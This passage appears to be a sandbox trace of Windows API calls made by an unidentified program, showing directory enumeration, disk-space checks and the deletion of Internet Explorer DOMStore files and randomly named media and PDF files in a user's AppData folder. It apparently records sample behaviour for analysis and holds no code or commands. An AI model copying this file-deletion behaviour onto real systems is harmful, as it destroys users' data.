ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.876] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.876] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.877] CoTaskMemFree (pv=0x4e1c10) [0147.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.878] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.878] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.879] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.879] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.880] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.880] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.880] CoTaskMemFree (pv=0x4e1c10) [0147.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.881] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.881] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.882] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.883] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.884] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.884] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.884] CoTaskMemFree (pv=0x4e1c10) [0147.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.885] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.885] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.886] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.886] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.887] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.887] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.887] CoTaskMemFree (pv=0x4e1c10) [0147.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.888] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.888] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0147.889] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.890] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0147.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0147.891] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.891] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.891] CoTaskMemFree (pv=0x4e1c10) [0147.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0147.892] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.892] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0147.892] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0147.893] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0147.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0147.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0147.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0147.894] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.894] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.895] CoTaskMemFree (pv=0x4e1c10) [0147.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.896] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.896] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.896] CoTaskMemFree (pv=0x4e1c10) [0147.899] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.899] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.899] CoTaskMemFree (pv=0x4e1c10) [0147.902] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.902] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.902] CoTaskMemFree (pv=0x4e1c10) [0147.904] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.904] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.904] CoTaskMemFree (pv=0x4e1c10) [0147.909] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.909] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.909] CoTaskMemFree (pv=0x4e1c10) [0147.910] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.910] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.910] CoTaskMemFree (pv=0x4e1c10) [0147.911] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.911] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.911] CoTaskMemFree (pv=0x4e1c10) [0147.912] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.912] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.913] CoTaskMemFree (pv=0x4e1c10) [0147.913] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.914] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.914] CoTaskMemFree (pv=0x4e1c10) [0147.915] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0147.920] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml", dwFileAttributes=0x80) returned 1 [0147.920] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml")) returned 1 [0147.923] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.923] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.923] CoTaskMemFree (pv=0x4e1c10) [0147.925] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0147.929] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml", dwFileAttributes=0x80) returned 1 [0147.930] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml")) returned 1 [0147.933] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.933] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.933] CoTaskMemFree (pv=0x4e1c10) [0147.934] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.934] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.934] CoTaskMemFree (pv=0x4e1c10) [0147.935] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0147.941] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml", dwFileAttributes=0x80) returned 1 [0147.941] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml")) returned 1 [0147.944] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.944] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.944] CoTaskMemFree (pv=0x4e1c10) [0147.945] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.945] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.945] CoTaskMemFree (pv=0x4e1c10) [0147.947] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.947] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.947] CoTaskMemFree (pv=0x4e1c10) [0147.948] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.948] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.949] CoTaskMemFree (pv=0x4e1c10) [0147.949] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.949] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.950] CoTaskMemFree (pv=0x4e1c10) [0147.951] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.951] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.951] CoTaskMemFree (pv=0x4e1c10) [0147.953] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.953] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.953] CoTaskMemFree (pv=0x4e1c10) [0147.954] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.954] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.954] CoTaskMemFree (pv=0x4e1c10) [0147.955] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.955] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.955] CoTaskMemFree (pv=0x4e1c10) [0147.956] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.956] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.956] CoTaskMemFree (pv=0x4e1c10) [0147.957] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0147.966] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-gsOvE2Y.wav", dwFileAttributes=0x80) returned 1 [0147.967] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-gsOvE2Y.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-gsove2y.wav")) returned 1 [0147.970] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0147.976] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4bxvedCN_.pdf", dwFileAttributes=0x80) returned 1 [0147.976] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4bxvedCN_.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\4bxvedcn_.pdf")) returned 1 [0147.981] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0147.987] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9Trv8ebwwt9-dP-4.wav", dwFileAttributes=0x80) returned 1 [0147.988] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9Trv8ebwwt9-dP-4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9trv8ebwwt9-dp-4.wav")) returned 1 [0147.991] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0147.997] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\APC-W2.jpg", dwFileAttributes=0x80) returned 1 [0147.998] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\APC-W2.jpg" (normalized: "c:\\users\\5p5nrgjn0js 